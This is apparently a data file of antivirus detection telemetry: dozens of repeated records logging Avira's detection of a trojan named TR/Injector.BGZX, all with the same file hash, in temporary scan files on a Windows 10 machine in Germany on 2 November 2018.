  Row(detection=Row(filename='avscan-20181102-052200-31e36928', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052200-31E36928', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052930-3df6d3bb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052930-3DF6D3BB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052921-39028d2e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052921-39028D2E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052133-21cbf146', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052133-21CBF146', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052905-2f934d1f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052905-2F934D1F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052915-350fa000', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052915-350FA000', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052108-12ecb1b4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052108-12ECB1B4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052906-3037ab2c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052906-3037AB2C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052940-44398648', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052940-44398648', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052152-2d490b53', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052152-2D490B53', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052107-12b2f906', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052107-12B2F906', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052106-119df67c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052106-119DF67C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052106-11a9aef7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052106-11A9AEF7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052115-17132d29', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052115-17132D29', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052136-23b954f5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052136-23B954F5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052138-24fee247', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052138-24FEE247', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052126-1d91ee44', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052126-1D91EE44', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052905-2f78ce00', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052905-2F78CE00', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051323-fe032858', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051323-FE032858', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052126-1dc7fab8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052126-1DC7FAB8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052155-2f175d38', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052155-2F175D38', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051311-f67bc55c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051311-F67BC55C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051310-f616b89d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051310-F616B89D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051310-f6267b68', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051310-F6267B68', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051347-0c401786', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051347-0C401786', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052933-3fd0a929', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052933-3FD0A929', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051307-f409d617', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051307-F409D617', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052116-17c21313', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052116-17C21313', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052953-4c3458fd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052953-4C3458FD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051350-0db5d8d1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051350-0DB5D8D1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051336-05c5130e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051336-05C5130E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052931-3e97c72e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052931-3E97C72E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051326-ffb9f0b2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051326-FFB9F0B2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052912-3358814e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052912-3358814E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051308-f50b5d1f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051308-F50B5D1F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052128-1f1f64e6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052128-1F1F64E6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051348-0cddb06d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051348-0CDDB06D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052946-47a99329', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052946-47A99329', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052930-3e653e8c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052930-3E653E8C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052946-47c3612a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052946-47C3612A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051309-f5c8a3c6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051309-F5C8A3C6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052957-4e4f19e9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052957-4E4F19E9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051345-0b11f8c4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051345-0B11F8C4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053034-64311534', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053034-64311534', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:30:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051345-0b2c8e2e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051345-0B2C8E2E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051325-ff296530', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051325-FF296530', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052914-3485ec65', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052914-3485EC65', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051345-0ab095d0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051345-0AB095D0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052114-1678302a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052114-1678302A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051356-11733fc4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051356-11733FC4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053007-5425a1a7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053007-5425A1A7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:30:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051313-f7d107a5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051313-F7D107A5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053008-54a3f6c8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053008-54A3F6C8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:30:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053007-5444ab5c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053007-5444AB5C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:30:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051319-fb8ee949', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051319-FB8EE949', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:18Z'), dt=datetime.date(2018, 11, 2)),
